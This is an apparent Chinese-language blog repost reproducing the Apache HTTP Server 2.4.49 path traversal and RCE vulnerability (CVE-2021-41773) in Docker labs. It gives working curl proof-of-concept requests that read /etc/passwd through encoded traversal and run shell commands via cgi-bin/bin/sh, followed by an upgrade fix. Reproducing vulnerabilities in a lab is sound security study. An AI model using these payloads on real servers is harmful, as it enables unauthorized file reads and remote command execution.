标签:41773 HTTP 2e cgid .% 漏洞 RCE
目录
一. Vulnerable file read config(易受攻击的文件读取配置)
二、Vulnerable RCE config(易受攻击的 RCE 配置)
漏洞简介
该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory />Require all granted</Directory> 允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件
在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令(RCE)
漏洞复现
一. Vulnerable file read config(易受攻击的文件读取配置)
环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
漏洞利用
使用POC: curl http://IP:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Burp抓包
二、Vulnerable RCE config(易受攻击的 RCE 配置)
在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令
环境搭建
docker pull blueteamsteve/cve-2021-41773:with-cgid
docker run -dit -p 8081:80 blueteamsteve/cve-2021-41773:with-cgid
漏洞利用
curl 'IP:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Burp抓包
漏洞修复
升级到Apache HTTP Server最新安全版本,或使用Apache HTTP Server 非 2.4.49版
标签:41773,HTTP,2e,cgid,.%,漏洞,RCE 来源: https://blog.csdn.net/weixin_47306547/article/details/122288804
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。